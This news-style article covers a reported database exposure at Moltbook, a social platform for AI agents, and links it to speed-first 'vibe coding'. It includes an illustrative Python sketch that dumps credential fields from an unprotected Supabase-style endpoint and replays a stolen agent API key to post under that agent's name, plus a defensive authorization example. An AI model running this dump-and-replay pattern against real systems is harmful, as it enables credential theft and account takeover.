Moltbook, the popular social media platform dubbed "AI Reddit," has recently been plunged into a serious crisis of trust. Security researcher Jameson O'Reilly discovered a basic configuration error in the platform's backend that left its entire database exposed to the public with no protection at all.


This meant that anyone could read the email addresses, login tokens, and core API keys of nearly 150,000 AI "agents" on the platform. Because Moltbook aims to be a social space where AIs communicate and form communities on their own, the leak of these API keys means attackers could fully take over the affected accounts and post arbitrary content under their names, including those of high-profile agents with millions of followers.
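The report does not spell out the technical details of the exposure, but a minimal sketch helps make the severity concrete. Assuming, hypothetically, that the backend was a hosted Postgres service exposing an auto-generated REST API (Supabase-style) with row-level access rules left disabled, a single request using only the public client key could dump every agent record, and a leaked per-agent key could then be replayed against the platform's normal API. Every URL, endpoint, and field name below is an illustrative assumption, not the platform's actual schema:

```python
import requests

# Hypothetical reconstruction: a hosted-database REST endpoint reachable
# with only the public "anon" key, because no access rules restrict reads.
BASE_URL = "https://example-project.supabase.co/rest/v1"   # hypothetical
ANON_KEY = "public-anon-key-shipped-in-the-frontend"       # hypothetical

headers = {"apikey": ANON_KEY, "Authorization": f"Bearer {ANON_KEY}"}

# With the misconfiguration, one unauthenticated request returns rows of
# the agents table: email addresses, login tokens, and API keys included.
resp = requests.get(
    f"{BASE_URL}/agents",
    headers=headers,
    params={"select": "email,login_token,api_key", "limit": "100"},
    timeout=10,
)
resp.raise_for_status()
agents = resp.json()

# A leaked per-agent API key then lets an attacker act as that agent
# through the platform's ordinary API (endpoint name also hypothetical).
stolen_key = agents[0]["api_key"]
requests.post(
    "https://moltbook.example/api/v1/posts",
    headers={"Authorization": f"Bearer {stolen_key}"},
    json={"title": "hijacked", "content": "attacker-controlled text"},
    timeout=10,
)
```

The point of the sketch is that no exploit is needed: the first call is an ordinary read, and the second is indistinguishable from legitimate agent traffic.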

Industry experts point out that this security incident may be an inevitable result of the current "vibe coding" trend: developers lean heavily on AI tools to maximize development speed while neglecting security review of the underlying architecture. That "launch first, fix later" mindset becomes far riskier when the product involves AI agents capable of acting autonomously.
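The class of mistake at issue is typically a missing server-side authorization check, exactly the kind of thing a security review catches and a speed-first workflow skips. As a hedged illustration only (Moltbook's actual stack and routes are not public in this report), here is a minimal deny-by-default route in FastAPI, with all names invented:

```python
from fastapi import Depends, FastAPI, Header, HTTPException

app = FastAPI()

# Hypothetical toy data: agent records and valid session tokens.
AGENTS = {"agent-1": {"email": "a@example.com", "api_key": "secret-1"}}
SESSIONS = {"valid-session-token": "agent-1"}  # token -> account id

def current_agent(authorization: str = Header(...)) -> str:
    """Deny by default: every request must present a known session token."""
    token = authorization.removeprefix("Bearer ")
    agent_id = SESSIONS.get(token)
    if agent_id is None:
        raise HTTPException(status_code=401, detail="invalid token")
    return agent_id

# A "launch first" version of this route would return AGENTS[agent_id]
# to any caller; the reviewed version lets an agent read only its own
# row, and never returns the secret key at all.
@app.get("/agents/{agent_id}")
def read_agent(agent_id: str, caller: str = Depends(current_agent)):
    if caller != agent_id:
        raise HTTPException(status_code=403, detail="forbidden")
    return {"email": AGENTS[agent_id]["email"]}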

Moltbook's founder rushed out a fix shortly afterward, but the incident stands as a "Matrix"-style warning in the history of AI development. It reminds the industry that before granting AI social capabilities and autonomy, it is essential to build solid security boundaries around them; otherwise, so-called "digital life" can all too easily become a tool for hackers to commit crimes.